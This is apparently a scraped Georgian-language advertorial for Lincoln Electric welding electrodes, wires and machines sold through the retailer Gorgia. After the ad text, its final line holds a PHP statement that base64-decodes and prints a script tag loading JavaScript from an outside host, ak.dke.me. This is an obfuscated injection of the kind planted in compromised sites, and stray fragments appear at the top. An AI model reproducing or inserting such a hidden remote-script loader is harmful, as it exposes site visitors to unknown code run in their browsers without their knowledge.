celsiusi
ავერსი jaluzi

11 000-ზე მეტი თანამშრომლით, 60-მდე ქარხნითა და 3.8 მილიარდი დოლარის შემოსავლით, Lincoln Electric არის მსოფლიოში ყველაზე დიდი კომპანია შედუღების სფეროში. ის ამ მიმართულებით მოღვაწე ტოპ 3 ბრენდში შედის.

Lincoln Electric ამერიკული ბრენდია, რომელიც 1895 წელს შეიქმნა. შედუღების წამყვანი ექსპერტებისა და თანამედროვე მიდგომების მეშვეობით ბრენდმა შეძლო და მოიპოვა ლიდერობა შედუღების სფეროში.
ლინკოლნს 60 ქარხანა აქვს მსოფლიოს 19 ქვეყანაში, მათ შორის იტალიაში, პოლონეთში, საფრანგეთსა და რუმინეთში. საერთო ჯამში კი ის 160 ქვეყანაში იყიდება. 2022 წლიდან „გორგია“ გახდა ლინკოლნის ექსკლუზიური იმპორტიორი საქართველოში.

ლინკოლნის პროდუქცია გორგიაში:
ლინკოლნი აწარმოებს ყველაფერს, რაც შედუღების სფეროში შეიძლება დაგჭირდეთ. შედუღების მიმართულება არის ძალიან მოთხოვნადი და მზარდი მიმართულება საქართველოში. ამ ეტაპზე გორგიას ფილილებში წარმოდგენილია სხვადასხვა ტიპის ელექტროდები, კემპის მავთულები, შედუღების აპარატები და ტიგის შესადუღებელი ჩხირები.


ქვეყანაში მიმდინარე ყველაზე დიდ პროექტებში ლინკოლნის აპარატებს იყენებენ. მილსადენის პროექტი- როგორიცაა „ბაქო-თბილისი-ჯეიჰანი“, განხორციელებულია ლინკოლნის პროდუქციით. ასევე, მრავალი ჰიდროელექტროსადგური თუ ნავთობ ტერმინალი საქართველოში ძირითადად ლინკოლნის აპარატებითა და მასალებითაა შესრულებული.


DIY მიმართულება
ყოველდღიურ საქმიანობაში, თუნდაც DIY პროექტებისთვის ყველაზე ხშირად გამოიყენება ცვლადი დენის ელექტროდები და კემპის მავთულები. ამ მიმართულებით ლინკოლნი მომხმარებლებს სთავაზობს უმაღლესი ხარისხის პროდუქციას კონკურენტულ ფასად. აღნიშნული პროდუქცია თავის მხრივ გამოირჩევა მოხმრების სიმარტივითა და შედუღების ხარისხით.


ლინკოლნის პროდუქციის შეძენა შესაძლებელია როგორც გორგიას ყველა ფილიალში, ასევე ონლაინ - GORGIA.GE-ზე.

(R)

 

248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");